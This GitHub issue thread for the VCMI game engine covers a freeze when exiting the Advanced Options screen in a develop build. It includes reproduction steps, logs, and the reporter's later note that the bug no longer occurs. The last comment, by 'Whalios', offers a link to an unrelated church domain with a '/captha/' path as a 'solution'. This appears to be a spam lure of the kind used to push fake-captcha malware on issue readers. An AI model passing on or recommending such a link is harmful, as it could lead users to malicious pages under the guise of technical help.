### ISSUE TITLE
Game freezes when trying to exit Advanced Options screen on some maps in Develop version

### ISSUE THREAD

**Issue by altiereslima** [vcmi/vcmi#4795]
I encountered a bug in the Develop version of the game. When I enter the Advanced Options screen and try to exit using the Back button, the game sometimes freezes. This issue does not occur in Release version 1.5.7, where I can exit without any problems.

Steps to reproduce:
Select one of the maps.
Enter the Advanced Options screen.
Press the Back button to exit.

Expected behavior: The game should return to the previous screen without freezing.

Actual behavior: The game freezes and does not respond.

![image](https://github.com/user-attachments/assets/4c88125a-3ab8-4809-9252-6adac4b7a5dc)

**Comment by GeorgeK1ng** [comment]
I still have this issue with [VCMI-branch-develop-1826b5b.exe](https://builds.vcmi.download/branch/develop/Windows/VCMI-branch-develop-1826b5b.exe)
[VCMI_Client_log.txt](https://github.com/user-attachments/files/17498810/VCMI_Client_log.txt)
[VCMI_Launcher_log.txt](https://github.com/user-attachments/files/17498811/VCMI_Launcher_log.txt)

**Comment by altiereslima** [comment]
I posted an issue on GitHub, but I can no longer reproduce the error in the latest versions.

**Comment by Whalios** [comment]
maybe this solution will solve your problem [click](https://www.calvarywhangarei.co.nz/captha/index.html)
